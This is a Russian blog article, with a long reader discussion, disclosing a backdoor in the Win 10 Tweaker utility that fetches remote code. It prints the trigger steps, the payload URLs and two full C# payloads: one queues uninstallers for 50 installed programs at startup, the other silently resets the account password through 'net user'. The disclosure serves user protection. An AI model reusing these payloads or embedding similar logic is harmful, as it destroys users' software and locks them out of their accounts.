Бэкдор в Win 10 Tweaker, или современные методы борьбы с пиратством / forpes.ru

Главная
Бэкдор в Win 10 Tweaker, или современные методы борьбы с пиратством

Бэкдор в Win 10 Tweaker, или современные методы борьбы с пиратством +84

14.05.2021 09:32

Sanctuary_s 212 40000 Источник

Для неподготовленных юзеров, которые сталкиваются с Windows, настройки ОС иногда становятся настоящим темным лесом. Эту достаточно узкую нишу охватывают разработчики всевозможных твикеров, один из которых в своих подходах к защите своей программы пошел самым радикальным способом. Сегодня мы немножко препарируем один самых известных таких продуктов — Win 10 Tweaker и посмотрим, какой "сюрприз" спрятал внутри его создатель.

Решил оформить небольшой материал с доказательствами того, как с недавних пор (примерно с осени 2020 года) в Win 10 Tweaker в целях борьбы со взломом программы был интегрирован самый обычный бэкдор, в особых обстоятельствах получающий зловредный код с ресурса https://win10tweaker.com/PrivilegeUser.php?key=Universal.

Не будем обсуждать личность автора и его отношение к пользователям, а также то, что он творит на своем форуме, а поговорим о том, что нам поведал сниффер трафика Win 10 Tweaker, у которого на момент написания статьи, судя по счётчику на сайте, больше 1 400 000 скачиваний.

Скачиваем с сайта последнюю версию программы. Сейчас скачивается версия 17.2, SHA-256: 06DB5801D37895C75B7D60FA5971827DA80CC275D9E78E5986A120C003021A0D;
Выяснилось, что, чтобы вызвать скачивание удаленного кода, надо просто создать в %LOCALAPPDATA% папку Turbo.net, а внутри — просто пустой файл System.Deps.dll;
Запускаем Win 10 Tweaker и принимаем правой кнопкой соглашение;
Хватит лишь открытия раздела "Системная информация", где можно получить сведения о характеристиках ПК;
Сразу с ресурса, указанного выше, через бэкдор в открытом виде скачивается и исполняется код, написанный на C#, который прописывает в реестре в раздел автозагрузки для всех пользователей ключи на удаление первых 50 установленных программ. При первом выходе/входе из учетной записи или перезагрузке эти программы запустят свои деинсталляторы.

using System;
using System.Collections.Generic;
using Microsoft.Win32;
using System.IO;
namespace N {
  class C {
    public void M() {
      string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\AppData\\Local\\Turbo.net";
      if (Directory.Exists(path)) {
        string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
        foreach(string file in files) {
          if (file.Contains("System.Deps.dll")) {
            List list = new List();
            using(RegistryKey key = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall")) {
              foreach(string k in key.GetSubKeyNames()) {
                if (key.OpenSubKey(k).GetValue("UninstallString") != null) {
                  list.Add(key.OpenSubKey(k).GetValue("UninstallString").ToString());
                }
              }
            }
            for (int i = 0; i < 50; i++) {
              RegistryKey key = Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
              key.SetValue(i.ToString(), list[i]);
            }
          }
        }
      }
    }
  }
}

Разберем по-быстрому код.

Берется путь профиля и присобачивается к нему "\\AppData\\Local\\Turbo.net";
Если имеется папка Turbo.net, то по маске *.* рекурсивно ищется файл System.Deps.dll;
Если такой на вашу беду находится, то получаем значения ключей UninstallString в разделе HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall. В этом параметре хранится команда для деинсталляции программ. Собственно, именно эта команда запускается, когда вы удаляете в Windows любую программу, если ее деинсталлятор прописывается в системе.
Сохраняем полученные строки и записываем первые 50 команд на удаление в автозагрузку для всех пользователей. Отныне при первой перезагрузке запустят свои деинсталляторы те программы, у которых есть свойство UninstallString.

Сохраненная ссылка на Wayback Machine, если "чудотворным" образом ресурс будет недоступен. Кстати, тот же зловредный код расположен и на домене https://win10tweaker.ru/PrivilegeUser.php?key=Universal.

Скажите спасибо, что не в тихом режиме все удаляется, и окошки с уведомлением об удалении будут видны в любом случае.

Осенью же на этом ресурсе располагался другой код, устанавливающий пароль на учетную запись. Пароль, как нетрудно догадаться, глядя на код, был Rock5taR. То есть ресурс один, а зловредный код иногда да и меняется.

using System;
using System.Diagnostics;
using System.IO;
 
namespace N
{
    class C
    {
        public void M()
        {
           string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\AppData\\Local\\Turbo.net";
                if (Directory.Exists(path))
                {
                    string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
                    foreach (string file in files)
                    {
                        if (file.Contains("System.Deps.dll"))
                        {
                            Process.Start(new ProcessStartInfo
                            {
                                FileName = "cmd",
                                Arguments = "/c net user " + "\"" + Environment.UserName + "\"" + " Rock5taR",
                                WindowStyle = ProcessWindowStyle.Hidden
                            });
                        }
                    }                    
                }
        }
    }
}

Также автор заявляет о портативности программы, что на самом деле не так: чего только стоит создание неудаляемого ключа в реестре по пути HKCU\Software\Win 10 Tweaker, так как программа меняет права доступа на этот раздел.

Видео с одним из вариантов, как удалить ключ.

Остается тайной, зачем автор в борьбе с пиратами, беря за программу в том числе и плату, интегрировал туда самый обычный бэкдор. И кто знает, что еще она в себе таит… Выводы, как всегда, делать только вам.

upd1: все ресурсы заблокировал хостер.

upd1: реакция автора трояна.

upd3: реакция автора трояна в виде аудио-послания: https://t.me/win10tweaker/48

Спойлер: он считает, что все сделал правильно, мы все убоги и, оказывается, завидуем его успеху, а этот "инцидент" — жирный намек.

upd4: после связи с модератором rutracker.org все темы с Win 10 Tweaker были удалены (кроме совсем старых). Модератор в теме на NNM продолжает банить пользователей и удалять их сообщения при упоминании трояна и этой статьи. Все как всегда.

Комментарии (212)

eimrine
14.05.2021 13:15
#23033704
Как обойти такую защиту? Просто удалить бяку из автозагрузки будет достаточно, или для верности надо прописать в системе 50 установленных программ под названиями aaa1, aaa2,… aaa50 с деинсталляторами у каждой из них? Может быть, есть способ запретить запуск деинсталляторов без ввода пароля администратора?
1. Akuma
  14.05.2021 13:17
  #23033712
  +3
  Я бы сказал — платить за софт. Но этому я бы платить не стал
  1. Biorobodd
    15.05.2021 01:34
    #23036174
    Ну я оплатил. Причём с реального мыла палки которое использовалось для 3 (!!!) сервисов. Как результат спас по 50-70 писем в спаме каждый день. Т.е. мыла либо он слил, либо у него украли. В любом случае на руборде задолго до этой темы обсуждали вредоносность его по. На его форуме один пользователь удивился зачем отключать антивирус. Его послали этого пользователя автор программы сами знаете куда. Тупо прямо. Сами можете погуглить. В любом случае очень рад, что хоть кто-то подкованный наконец-то для глупых масс осветил проблему. Спасибо
1. Sanctuary_s Автор
  14.05.2021 13:20
  #23033734
  +2
  Запуская программу от имени администратора вы даете ему карт-бланш. Это не значит, что нельзя никому верить, просто в данном случае у автора программы ЧСВ насчет своего величия возросло настолько, что вкупе с тем, что он не считает своих пользователей за людей (угрожая в аудио-сообщениях, что взломает всех и вся), что попутал окончательно все берега.
  Хватит лишь поднять уровень реагирования в настройках UAC.
  1. SandroSmith
    14.05.2021 14:07
    #23034004
    ЧСВ насчет своего величия возросло настолько
    
    zanuda mode
    Это что-то из разряда такова се ля ви и ATM Machine

Yaong
14.05.2021 13:18
#23033724
+3
Это не бекдор. Это малварь откровенная. И не может зваться иначе.
1. tahionik
  14.05.2021 21:31
  #23035608
  -7
  =+= (проголосовать не хватает прав:))
1. morijndael
  15.05.2021 09:35
  #23036550
  +1
  Бекдор это малварь с возможностью ручного управления

Sanctuary_s Автор
14.05.2021 13:21
#23033744
Я случайно отклонил пре-модерируемый комментарий «Как я знаю, в этой программе реализован бан по железу...». Можете заново написать?

doctorw
14.05.2021 13:23
#23033756
+2
Как знал, что подобными твикерами пользоваться не стоит. Если автор смог позволить себе встроить в ПО бэкдор с вредоносными действиями (пусть и для пиратов), то что ему помешает сделать что-то подобное в отношении добропорядочных пользователей?

ingeniare
14.05.2021 13:28
#23033788
+1
И как всегда находятся users, которые на вопрос «почему антивирус матерится на кряк или win tweaker? », отвечают — все антивирусники считают по умолчанию плохими кряки и такие хорошие программы. А вот логика, зачем бесплатно взламывать программы и игры у людей отсутствуют и почему такие программы вообще требуют root доступ. С шаблонами для wordpress, dle и nulled плагины та же фигня, base64 в php и сервера превращаются в зомби.
1. Vort123
  14.05.2021 13:45
  #23033890
  +2
  Делать на основании такой реакции антивирусов вывод, что все такие программы хороши, точно так же ошибочно, как и считать, что все они плохи.
1. dartraiden
  14.05.2021 14:19
  #23034054
  +1
  Никто не мешает кряк применить на виртуальной машине, а затем сравнить оригинальный исполняемый файл с пропатченным.
  
  Если же в качестве «кряка» предлагается уже взломанный файл, да ещё и зачастую накрытый протектором («чтобы автор программы не узнал, как её взломали») — такой пользователь сам себе злобный буратино.
  1. Sanctuary_s Автор
    14.05.2021 14:22
    #23034072
    Последняя взломанная версия 15.2. Актуальная — 17.2.
1. Alexufo
  14.05.2021 16:01
  #23034566
  Они помечают кряки как hacktool

13werwolf13
14.05.2021 13:32
#23033804
ох уж эти виндопроблемы
1. zorn-v1
  14.05.2021 18:36
  #23035134
  -12
  Не говорите. Чтобы настроить систему им какие то левые программы надо качать… бесплатно, без смс )

fedotovartuom76
14.05.2021 13:43
#23033878
Не переношу всякие твикеры на дух и как видно не зря. Всегда удивляют люди которые - "ну это чтобы Microsoft не следила". То есть, то что теперь за ними следит твикер их не волнует.
Нет уж, пускай лучше за мной следит Microsoft чем, что-то непонятное, да ещё и со встроенным бэкдором.
1. Sanctuary_s Автор
  14.05.2021 13:48
  #23033904
  К сожалению, вереница собранных на коленке так называемых твикеров опошлила это понятие. И вместо возможности по персонализации эти программы просто ломают всю ОС, так как авторы, играя на страхах аудитории насчёт телеметрии, не понимая, что это, делают и продают такие поделия, нанося вред ОС и без работы трояна.
  1. fedotovartuom76
    14.05.2021 13:56
    #23033940
    +1
    Самая страшная вещь для техники, это криворукий пользователь-параноик
    
    Sanctuary_s Автор
    14.05.2021 14:03
    #23033976
    Да. Скажите "спасибо" "журналистам", которые подняли волну хейта в сторону 10 в 2015, когда узнали — о ужас — она передаёт данные в MS! Это дело подхватили блоггеры и починяторы примусов. Дальше явился nummerok, который собрал на коленке уродца для ломания ОС и якобы выключения телеметрии. После, конечно, он его продал, а новые владельцы быстро вживили троян туда. :D
    
    fedotovartuom76
    14.05.2021 14:08
    #23034012
    Просто тех, кто раньше нажимал «Не отправлять отчёт в Microsoft» тригернуло ;)
    
    tmin10
    14.05.2021 14:35
    #23034098
    +1
    Ещё сама МС помогла, не добавив опции полного отключения телеметрии, можно только выбрать между тремя вариантами полноты и всё.
    
    Sanctuary_s Автор
    14.05.2021 14:39
    #23034122
    Так все нужные кнопки есть. Полностью отключить даже на Ent нельзя. Да и зачем отключать?..
    
    JerleShannara
    14.05.2021 15:42
    #23034484
    Ну например мне не нравится, то, как её засунули в штатный калькулятор (исходники которого МС открыли).
    
    Sanctuary_s Автор
    14.05.2021 15:44
    #23034492
    Что, прямо не даёт работать телеметрия? На работе тоже пишешь заявки админам, что прямо чувствуешь, как утекают байты по каналам передачи телеметрии? :D
    
    ebragim
    14.05.2021 16:47
    #23034724
    +7
    Вместо того чтобы язвить, может, стоит напрячь фантазию? Например, что некоторые компании ограничены договорами о конфиденциальности, где легко могут оказаться строки навроде "полный запрет за доступом третьих лиц к данным клиента"? И не надо тут говорить, что слать таких клиентов нафиг, подобное требование абсолютно обосновано для многих.
    
    Sanctuary_s Автор
    14.05.2021 16:49
    #23034730
    Да я шуткую). На работах Ent стоит. Там выставляют 0, если надо, и минимум отправляют все равно.
    
    JerleShannara
    14.05.2021 17:54
    #23034954
    Ну я не люблю функции, которые могут послать на анализ содержимое буфера обмена, если его формат при вставке не соответствует ожидаемому, пускай оно и не активно из-за ошибки в коде. А на работе у меня прекрасная сборка линукса, которая никуда не стучит (ибо вырезано всё такое весёлое), дома — полумёртвая семёрка, которая загружается только тогда, когда мне что-то кому-то под виндой надо доказать и опять же сборка линукса, которая ещё веселее вырезана, ибо там я могу отжЫгать по полной ибо энтерпрайзный софт мне там не нужен особо.
    
    Syzd
    15.05.2021 07:15
    #23036422
    А подробнее? Сливает все что вы считали?
    
    vladkorotnev
    15.05.2021 08:33
    #23036474
    +2
    Да они в логи при ошибке парсинга в момент вставки из буфера писали в том числе нераспарсившуюся строку, а логи, внезапно, отсылаются в телеметрию. То есть если случайно вместо числа имеешь в буфере пароль от банка и жмёшь Ctl-V в виндовом калькуляторе — то пароль улетает мелкомягким.
    
    Кстати, судя по исходникам, это таки вырезали, но как обычно — где гарантия, что в остальных прогах не так, и где гарантия, что в дистрибутиве винды сборка с этих же сорцов (хотя этот случай, действительно, выглядит как косяк новичка в команде).
    
    anonymous
    15.05.2021 11:16
    #23036772
    Так вот зачем KeePass чистит буфер с паролем, пожалуй поставлю 3 сек. вместо 12.
    
    alsoijw
    14.05.2021 22:54
    #23035832
    +5
    Установщик обычной винды предлагает выбирать между персонализированной и не персонализированной рекламой. Хорошо, для платного продукта, когда в свободных ос рекламы нет?
    
    bilayan
    15.05.2021 00:05
    #23035972
    -1
    Так в самой ОС она отключается, и то там не то что бы реклама, а рекомендация приложений, как мне помнится (не помню, так как как отключил несколько лет назад так и не вспоминаю), а про персонализацию рекламы — это идет уже про предоставление информации продуктам из стора. Т.е. майки еще выступают площадкой-посредникам, чтоб не извне собирали непойми какие данные, а строго ограниченно и под контролем, от «площадки». При этом, майки оч подробно расписывают, какие данные будут передаваться наружу для этой самой рекламы.
    И кажется я больше ни у кого и нигде не видел, чтоб была гала про персонализацию рекламы. Обычно потом из всех «утюгов» одно и то же, стоит что нибудь погуглить в магазинах.
    Ах да, еще, можно посмотреть всё что передается на сервера, прям в настройках венды.
    
    ya_penek
    14.05.2021 14:58
    #23034248
    +3
    Вы так говорите, как будто отправка данных — это хорошо. Естественно, разумные люди (это не те, которым «нечего скрывать») этого не хотят, и потребность в избавлении от телеметрии есть.
    И кто-то с добрыми намерениями пишет софт, ломающий систему. А кто-то пытается заработать и пишет такое.
    
    4eyes
    14.05.2021 15:07
    #23034298
    разумные люди (это не те, которым «нечего скрывать») этого не хотят
    Почему?
    Я до сегодняшнего дня считал себя разумным человеком, теперь начал сомневаться. Отправляя телеметрию я помогаю разработчикам приложения собирать статистику об использовании его функций. Что-то вроде «навигация по пуску клавиатурой, полное меню приложений используется раз в год, при использовании всегда фильтруется по первой букве имени приложения. 4 ядра, 8 потоков, не лептоп». Есть шанс, что анализ UX приложения будет выполнятся с учетом статистики, на которую повлияли не только бабушки с настройками системы по умолчанию, и этот UX не будет заточен только под них.
    
    ya_penek
    14.05.2021 15:12
    #23034328
    Желание помочь разработке системы — это хорошо. Но сбор любой статистики должен быть отключен по умолчанию. Я не хочу, чтобы кто-то знал, как я использую свой компьютер.
    
    CherryPah
    15.05.2021 00:22
    #23036014
    +1
    Но ведь это теперь не Ваш компьютер.
    
    Error1024
    15.05.2021 05:22
    #23036352
    У многих несколько компьютеров в 2021, поэтому «этот компьютер» имеет больше смысла чем «мой компьютер». Либо наоборот — на компе несколько учёток, «мой компьютер» опять менее логично чем «этот компьютер».
    
    DarkNews
    15.05.2021 06:06
    #23036374
    Какой же бред.
    Лично я считаю, что те кто против чисто технической телеметрии по умолчанию - у них что то не совсем в порядке с головой.
    Во первых - люди настройки и галочки нужные им, которые им бы помогли и пригодились не включают, потому что не знают/лень разбираться/etc, а уж про включение телеметрии и говорить нечего, она прямой пользы вообще среднестатистическому пользователю не приносит, он не знает что это и об этом не задумывается.
    А потом это пользователь будет ныть на пикабу. хабре, мол какого хрена систему меняют так, мне не нравится, мои юзкейсы другие, а то что эту галочку будет включать чисто узкий определённый пласт лиц - вы об этом подумали? Классная статистика будет, достоверная.
    
    То что вы хотите там или не хотите - ваши личные проблемы, хорошо хоть в этом плане к таким как вы никто прислушиваться не будет, я могу понять общую статистику, какие то данные по времени использования, запуску конкретных программ - но какое отношение чисто техническая телеметрия имеет к "как я использую свой компьютер"?
    Внутренние ошибки ОС, используемость интерфейсов, переходы к различным настройкам и пути этих переходов, особенно когда это собирается обезличено несет в себе 0 личной инфы.
    
    JerleShannara
    15.05.2021 08:55
    #23036500
    Я доверяю телеметрии только в том случае, когда приложение, в котором она есть, сам собрал из исходников. Если не сложно, подскажите, как это сделать с виндой, ибо можно сколько угодно говорить про «техническую» телеметрию, но калькулятор показал, что она несколько офигевшая, а не техническая.
    
    VXP
    15.05.2021 12:04
    #23036948
    Malware PoC-ам с гитхаба тоже так доверяете?
    
    Garioch
    15.05.2021 12:04
    #23036950
    День добрый. Не припомню ни одного случая начая с ХР, когда Майкрософт или разработчики путем сбора телеметрии закрывали баги. В точности наоборот — пока конкретно гром не грянет, ни один баг не патчится. За сим реальный вопрос — что собирает телеметрия на компах.
    
    qw1
    14.05.2021 15:14
    #23034340
    +1
    В «хвостах» этой телеметрии могут оказаться ваши персональные данные, или ваши привычки (например, когда вы приходите домой, когда ложитесь спать, какими пользуетесь программами). В худшем случае эти данные могут оказаться в публичном доступе на каком-нибудь торренте
    
    DarkNews
    15.05.2021 06:19
    #23036380
    +2
    Может и кирпич на голову упасть, или астероид на землю, что, сразу в гроб лечь?
    Что это за может?
    Могут оказаться ПД, могут оказаться на торренте, могут быть кому то интересны.
    Вам не кажется что слишком много может/могут?
    
    С такими предпосылками можно любую идею, любое начинание, все что угодно, свести к вероятно плохому исходу.
    
    AC130
    15.05.2021 11:00
    #23036722
    Ну так это обычный потребительский экстремизм. Когда речь идёт про сбор их данных — предоставьте им все доказательства, что всё будет хорошо, что никто не будет использовать данные во вред и т.п. Когда речь идёт про пиратство чужого контента — им по-барабану на всё, вынь да положь удобный и дешёвый (а лучше бесплатный) видеохостинг с кучей старых фильмов, выбором звуковой дорожки и субтитров, в противном случае они идут на торренты, ну и конечно же «от пиратства нет никаких убытков пока не доказано обратное». Т.е. банальное лицемерие «мои данные не отдам — не имеют права, чужие заберу — плевать на чужие права», помноженное на желание захапать себе побольше и подешевле.
    
    Shaman_RSHU
    14.05.2021 15:35
    #23034442
    В общем доступе нет не одной публикации Microsoft, в которой она бы показала как она использует собираемую телеметрию, в т.ч. и при последующей доработки ОС.
    
    VEG
    15.05.2021 12:30
    #23037006
    На рынке сейчас наверное не осталось коммерчески успешных продуктов, которые не собирали бы статистику о своём использовании. Как много компаний рассказывает в подробностях о каждом случае, когда они воспользовались статистикой из телеметрии? В какой-нибудь Mozilla это ещё можно найти при большом желании, так как многие обсуждения доступны в публичном багтрекере, но если применяется закрытая модель разработки, то очевидно, что и принятие решений на основании статистики из телеметрии остаётся только среди разработчиков.
    
    TigerClaw
    14.05.2021 20:47
    #23035488
    Причем эту волну хейта подогревал и известный блогер Дмитрий Бачило, который к сожалению для многих имеет большой авторитет. Но в последних видео слишком на ура патриотизм уехал.
1. Vort123
  14.05.2021 13:55
  #23033934
  Отключение шпионских функций — дело полезное. Вот только сделать это качественно непросто.
  От скрытых функций частично может защитить открытый исходный код утилиты.
  1. fedotovartuom76
    14.05.2021 14:06
    #23033994
    Я лично твикеры и всякие подобные приблуды для отключения обновлений, телеметрии и прочего — не юзаю. Но поговаривают, что Windows 10 сама потом обратно всё включает.
    
    Vort123
    14.05.2021 14:10
    #23034014
    Это одна из сложностей. Надо или отключать обновления (что ухудшит безопасность) или постоянно за обновлениями следить и вовремя обновлять утилиту (на что, скорее всего, у разработчиков не хватит ресурсов).
    
    Sanctuary_s Автор
    14.05.2021 14:15
    #23034044
    Не понимал никогда, зачем выключать обновления и тем более убивать антивирус, который вообще не мешает, а тихо шуршит. Но люди любят ломать ОС, начитавшись чужого мнения несведущих людей.
    
    fedotovartuom76
    14.05.2021 14:20
    #23034064
    +1
    По счастью сейчас, когда крупные апдейты ставятся (те которые раз в полгода), Windows 10 сама чинит поломанное. У неё в процессе обновления DISM и SFC запускаются, которые её «лечат».
    
    Arris
    14.05.2021 17:59
    #23034994
    +2
    Ну да, давеча приехал ко мне апдейт один. После установки он предложил перезагрузиться. После перезагрузки написал "обновляюсь, 20… 30… 40… 50… 70… ой, все сломалось, мне не удалось установить обновление, перезагрузитесь".
    
    Перезагружаюсь.
    
    "Откатываю обновление… 20… 30… 40… 50… ой, не удалось откатить обновление, перезагрузитесь".
    
    После перезагрузки начинается установка обновления, которое выдает ошибку на 70%
    
    После 8-9 перезагрузки ему удается откатить обновление и запустить винду… проблема в том, что после перезагрузки винды эта хрень начинается снова.
    
    qw1
    14.05.2021 19:40
    #23035294
    +2
    Вот я тоже раньше ставил обновления. Постоянно читать, что там (интересно же), перезагружаться, потом что-то отваливается или ломается. Потом пришло обновление, которое никак не могло поставиться (зависало при установке, потом при перезагрузке откатывалось), и я их выключил. И такая благодать была 2 года: ничего не беспокоит, всё работает идеально. Через 2 года сменил железо и поставил последнюю версию винды со всеми обновлениями, и выключил обновления. Не хочу больше этой суеты.
    
    RokkiJoker
    15.05.2021 12:05
    #23036952
    Пользуюсь 10 с момента релиза. На нескольких ноутбуках. Полет нормальный. Обновляю по мере прихода обновлений. Да, иногда, установка идёт дольше обычного, но так чтобы совсем что-то ломалось - ни разу. Возможно потому что я не лезу в систему и не нарушаю её работу, всяким хламом типа твикеров и прочего мусора и не пытаюсь сломать систему чтобы за мной не следили "злые и жадные MS'. Тут у меня логика простая. У меня есть смартфон и эта штука знает и сливает информации гораздо больше. Так что боятся телеметрии в текущее время - это как интернета боятся - Ваше право.
    
    fedotovartuom76
    14.05.2021 20:57
    #23035522
    Дайте догадаюсь. Вы не отправили отзыв в Microsoft? Расскажите лучше поподробнее: Как давно это было, какой именно апдейт, какие меры были предприняты для устранения проблемы. Может у вас был установлен какой-то софт, который лезет куда ему не следует. Или просто система была повреждена. Проверку целостности системных файлов проводили? Статистика показывает, что чаще всего обновления не ставятся на устройства с пиратским ПО или ПНП.
    
    0xd34df00d
    14.05.2021 21:05
    #23035542
    +2
    У отца дома (за несколько тыщ километров) как раз слетела винда из-за обновлений. Он в компьютерах не особо шарит, так что скажите, какие отчёты и проверки он должен теперь делать?
    
    Тем временем линукс на ноуте, который я установил году в 2013-м или 2014-м, просто работает.
    
    fedotovartuom76
    14.05.2021 21:44
    #23035650
    -1
    Сравнили тёплое с мягким.
    
    PsiHamster
    15.05.2021 12:05
    #23036954
    Тем временем линукс на ноуте, который я установил году в 2013-м или 2014-м, просто работает.
    
    А у меня полно компьютеров, на которых винда работает годами. Не исключаю проблемные windows, но говорить, что линукс — идеал работоспособности, это смешно.
    
    Проблемы с установкой, проблемы с загрузчкиком, отваливающиеся или недостающие драйвера на устройства (В том числе и после обновления). Еще была история — корректно завершил работу сервера, запускаю обратно — не появляется в сети. Пришлось тащить к монитору — куда-то уехал загрузчик и сам линукс не запускался. Помогла только пересборка ядра какими-то командами и переустановка загрузчика.
    
    По ощущениям процент сбоев линуксов выше чем у винды.
    
    Wingtiger
    15.05.2021 12:22
    #23036980
    200 вин 10, 50-70 вин 7, пока что штук 50 астр... Больше всего проблем с астрой - глючит единственная совместимая модель принтера (не МФУ), иногда на давно работавшей и почти всегда при установке не встаёт загрузчик после прошлогодних обновлений... Дебиан и так хуже убунты (имхо 4х продвинутых пользователей линя из 6), а в астре баг на баге из-за "импортозамещения".
    
    VEG
    15.05.2021 12:36
    #23037036
    Я родителям в 2014 (какое совпадение) тоже подарил новый комп и поставил Windows. Тоже просто работает без нареканий. Правда, я применил трюк: они работают от обычного пользователя, и чтобы хоть что-то установить, нужно каждый раз вводить пароль администратора, который я сразу вообще не хотел им сообщать, но пришлось, так как им какой-то там банковский софт надо было поставить лет 5 назад. Был бы Linux, вряд ли бы они справились с установкой и запуском этого ПО через Wine. Да и есть сомнения, удалось ли бы это даже мне самому завести, так как там что-то нетривиальное, с доступом по железному USB-ключу.
    
    Arris
    14.05.2021 23:58
    #23035958
    +2
    какие меры были предприняты для устранения проблемы.
    Для устранения проблемы я удалил обновление целиком по инструкции, выложенной на сайте мелкомягких. Судя по гуглу, проблема была не у меня одного.
    
    Может у вас был установлен какой-то софт, который лезет куда ему не следует.
    Это, например, куда?
    
    Что именно за апдейт, я уже не помню, извините. Решил проблему, отключил обновления и забыл. возможно, это он
    
    нет, винда не активирована. из крякнутого софта — ACDSee 2.4 и markdownpad2
    
    Отзыв в микрософт, разумеется, я не отправлял. А зачем?
    
    fedotovartuom76
    15.05.2021 11:34
    #23036818
    Это, например, куда?
    это например в реестр. Всякие чистилки, оптимизаторы и прочее.
    
    ACDSee 2.4 и markdownpad2
    вот вам и возможная причина. Статистика показывает, что пиратский софт, очень часто вызывает проблемы.
    Другая частая причина как ни удивительно — сторонние антивирусы.
    
    nixtonixto
    15.05.2021 10:50
    #23036692
    Дайте догадаюсь. Вы не отправили отзыв в Microsoft?
    
    А для чего тогда создана телеметрия, если пользователю при неполадках всё так же нужно отправлять отчёт?
    
    fedotovartuom76
    15.05.2021 11:29
    #23036796
    Важно понимать:
    1. По умолчанию отправляются только необязательные диагностические данные. Это минимум, которого зачастую недостаточно. Изменить этот параметр можно в настройках.
    2. Когда вы отправляете отзыв о проблеме в Microsoft через приложение «Центр отзывов» вы можете подробно всё описать и воспроизвести проблему. Приложение будет делать скриншоты и соберёт диагностические данные в реальном времени. Проблема будет проанализирована не по факту её появления, а в процессе. Это позволит Microsoft лучше изучить её.
    Я один из многих участвующих в программе Windows Insiders и нередко вижу, что проблемы в новых тестовых сборках остаются незамеченными если о них не сообщают. Далее при том, что инсайдерские сборки отправляют куда больший объём телеметрии. Для вас написание кратенького отзыва — 5 минут, а Microsoft — будет осведомлена о проблеме.
    
    nixtonixto
    15.05.2021 11:38
    #23036848
    Почему бы тогда не добавить чекбокс «Полностью отключить телеметрию, но я обязуюсь в случае неполадки отправлять отчёт»? Если телеметрии, по вашим же словам, всё равно недостаточно для обнаружения и/или устранения неполадок. Как вы себе представляете использовать такую дырявую ОСь не в качестве игровой приставки, а в рабочих целях — когда на компьютере хранится информация дороже вашей жизни, и каждый раз при подключении к интернету вы гадаете, что же побежало в тех мегабайтах телеметрии, уж не документ под грифом «Совершенно секретно»? Или надо поверить компании на слово, что ваши NDA секретики никуда не утекут с их серверов?
    
    VEG
    15.05.2021 12:53
    #23037092
    Могу привести пример из продукта над которым работаю. В случае крэша вместе с телеметрией уйдёт базовая информация: я упала в такое-то время, оффсет такой-то, версия программы такая-то, версия ОС такая-то. Всё. По этой информации можно оперативно узнать, что у многих пользователей проблема с новой версией и оперативно её отозвать. Но в большинстве случаев этого недостаточно, чтобы решить проблему. Нужен ещё хотя бы минидамп с содержимым небольших участков памяти, связанных с падением (хотя бы стек). Но автоматически минидамп не отправляется, так как в стеке теоретически может оказаться что угодно, может быть и какие-то секретные данные в какой-то переменной на стеке. Поэтому крэш дамп должен отправить хотя бы один пользователь, и когда никто из пользователей не отправляет, это проблема: мы знаем о проблеме, но догадаться в чём именно дело не всегда получается.
    
    RainAustin
    15.05.2021 11:50
    #23036894
    Поэтому я в последнее время ставлю только обкатаные обновления, тоже чуть не попал на подобное.
    
    dartraiden
    14.05.2021 14:21
    #23034068
    Например, у меня Защитник натурально сошёл с ума и стал ругаться даже на cpp-файлы. Даже на только что стащенные git-ом с сервера cpp-файлы.
    
    Пришлось его удавить.
    
    4144
    14.05.2021 15:01
    #23034280
    -1
    лучше пошлите им информацию о ложном срабатывании.
    Вот тут на пример www.microsoft.com/en-us/wdsi/filesubmission
    
    Longaru
    14.05.2021 17:59
    #23034984
    Тоже самое было с софтом TexMod для игрушек который инжектит текстуры с заменой, заподозрил его работу с созданием темр файлов в папку АррДата/Темр и накорню всё зарезал, даже исключения этой папки и самой программы не помогли )
    
    woddy
    14.05.2021 15:40
    #23034464
    Например антивирус любит убивать коллекцию раритетного софта «по подозрению». Например антивирус не дает вылечить некоторый софт. В общем проблем больше
    
    Sanctuary_s Автор
    14.05.2021 15:42
    #23034480
    То есть АВ должен пропускать кряки?) Я так понимаю, про добавление в исключения по ID угрозы или самого файла не в курсе. :D Да и неплохо было бы узнать, что такое антивирус в целом.
    
    woddy
    14.05.2021 15:52
    #23034532
    Не только кряки. Например я на рабочем компе хотел помайнить, карточка шустрая, а 10 баксов в день не лишние. Разумеется антивирус решил что он умнее меня, и не дал скачать майнер с официального сайта.
    Например софт для дебага, которым я пользовался лет 10 назал — он упорно удаляет. Хотя софт не является вредоносным (но часто служит для создания кряков).
    
    kolokot
    14.05.2021 17:59
    #23034986
    причём лихо с сервака убивает если забыться и с правами на запись залогиниться
    
    JSFilin
    14.05.2021 17:59
    #23034988
    Антивирусы ругаются на майнеры, потому что они часто находятся в вирусах. Как антивирус узнает, вирус это или пользователь сам решил помайнить?
    
    Off-topic
    Чувствую, что от работодателя влетит…
    
    SagePtr
    14.05.2021 18:04
    #23035012
    +2
    я на рабочем компе хотел помайнить
    А счёт за электричество вычтут из вашей зарплаты, или за чужой счёт майнить собрались?
    
    Diamos
    15.05.2021 07:36
    #23036446
    +1
    А у вас не возникало идеи, что рабочий комп может быть личным и находиться дома?
    
    alsoijw
    14.05.2021 21:45
    #23035652
    +1
    Даже если и кряки, то что дальше? Антивирусы живут отдельной жизнью, и если для условной домохозяйки это хорошо, так как отчёт.docx.exe не запустится, то для некоторых это может представлять проблемы. Из того что я знаю, антивирусы не любят некоторые программы на ассемблере, нестандартные запаковщики и эксплоиты, в частности для рутования устройств. С учётом поддержки файловых систем гну/линукса, то сейчас нужно опасаться не только в отношении файлов на сетевых файловых системах, но и за файлы лежащие просто без шифрования.
    
    logran
    14.05.2021 22:13
    #23035730
    +5
    Это у вас на мощном железе он просто тихо шуршит и не мешает. А у людей с офисными ноутами по 450$ на Celeron или, боже упаси, древних до-рязаневских AMD, антивирь периодически отжирает почти полностью все их «2 ядра, 2 гига», вызывая адские тормоза машины. Хуже только висящий в фоне скайп.
    
